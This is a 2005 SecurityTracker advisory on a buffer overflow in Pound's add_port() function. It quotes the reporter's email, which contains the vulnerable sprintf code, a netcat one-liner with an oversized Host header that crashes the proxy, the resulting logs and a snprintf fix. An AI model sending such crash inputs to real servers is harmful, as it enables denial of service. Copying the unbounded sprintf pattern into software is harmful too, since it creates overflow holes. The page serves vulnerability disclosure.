SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Pound Vendors:  Apsis GmbH
Pound Buffer Overflow in add_port() Lets Remote Users Crash the Application
SecurityTracker Alert ID:  1013824
SecurityTracker URL:  http://securitytracker.com/id?1013824
CVE Reference:  CAN-2005-1391   (Links to External Site)
Updated:  May 3 2005
Original Entry Date:  Apr 28 2005
Impact:  Denial of service via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 1.8.3
Description:  A vulnerability was reported in Pound. A remote user can cause the application to crash.

A remote user can supply a specially crafted hostname of 2047 bytes that includes a port number specification to trigger a buffer overflow in Pound and cause the application to crash.

The vulnerability resides in the add_port() function in 'svc.c'.

[Editor's note: The report did not indicate if arbitrary code execution is possible or not.]

Steven Van Acker reported this vulnerability.
Impact:  A remote user can cause the application to crash.
Solution:  The vendor has issued a fixed version (1.8.3), available at:

http://www.apsis.ch/pound/
Vendor URL:  www.apsis.ch/pound/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Steven Van Acker <user@host.domain>
Message History:   None.

 Source Message Contents
Date:  2005-04-26 13:48:32
From:  Steven Van Acker <user@host.domain>
Subject:  remote buffer overflow in pound 1.8.2 + question abotu Host header

 
 
Hi,
 
more information on the buffer overflow later in this mail ;)
 
let me first ask the question that got me into digging into the code:
 
At our site, we use a weird failover setup on our webproxies (which are
running pound of course)
 
for each IP-address defined on the webproxy, a REDIRECT is done in
netfilter to a specific port from port 443.
 
For example connections to 192.168.0.2:443 are redirected to
192.168.0.1:444 and 192.168.0.3:443 to 192.168.0.1:445
We then have a number of pounds running, each on a different port ( 444
and 445 in this case), handling the requests
 
This allows us to have a hot standby webproxy listening on the same
ports, but without the IP's bound to interfaces. When the main webproxy
goes down, the backup detects it (keepalived), and takes over the IP's.
 
Because the pounds are listening to 1 specific port, and not IP's, the
socket on the backup webproxy does not have to be rebound to the IP of
the main webproxy (or a separate pound started on that IP), but it can
just start processing requests right away.
 
OK, right. and now for the problem.
 
Connecting to the webproxy on 192.168.0.2:443 redirects to
192.168.0.1:444. This connection is accepted by pound, which connects to
the backend and passes the host header: Host: 192.168.0.2:444
This is obviously not what was intended, because clients receiving URL's
with port 444 in it, won't be able to connect.
 
What I need is a way to manipulate the Host header sent to the backend.
Is there a way to do this ?
 
now the buffer overflow:
 
while going through the sourcecode to see where the portnumber is added
to a Host: header, I found this function in svc.c:
 
char *
add_port(char *host, struct sockaddr_in *to_host)
{
    char    res[MAXBUF];
 
    if(strchr(host, ':') != NULL)
        /* the host already contains a port */
        return NULL;
    sprintf(res, "Host: %s:%hd", host, ntohs(to_host->sin_port));
    return strdup(res);
}
 
MAXBUF is 2048
 
when a hostname of 2047 bytes is passed to pound, pound crashes because 
the res buffer is only 2048 bytes, and at least 2047+8 bytes are required.
At this point I haven't looked whether this could be exploited, but it is not
clean.
 
I tested it with this line:
 
(echo "GET / HTTP/1.0"; echo -n "Host: "; perl -e 'print "A"x2040'; ech
o; echo)
| nc 0.0.0.0 8080
followed by
(echo "GET / HTTP/1.0"; echo -n "Host: "; perl -e 'print "A"x2048'; ech
o; echo)
| nc 0.0.0.0 8080
 
(for some reason, I first need to send 2040 bytes...)
 
and this config:
 
ListenHTTP *,8080
 
UrlGroup ".*"
BackEnd 127.0.0.1,1234,1
EndGroup
 
On port 1234, there is just a netcat listening that allows pound to connect
 
This is what I get in the logs:
 
Apr 26 13:42:12 localhost pound: MONITOR: worker exited on signal 11,
restarting...
Apr 26 13:42:20 localhost pound: received signal 2 - exiting...
Apr 26 13:42:20 localhost pound: received signal 2 - exiting...
 
A quick and dirty patch would be to replace the line:
    sprintf(res, "Host: %s:%hd", host, ntohs(to_host->sin_port));
with:
    snprintf(res,sizeof(res) - 1,"Host: %s:%hd", host,
ntohs(to_host->sin_port));
    
greets,
-- Steven Van Acker


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC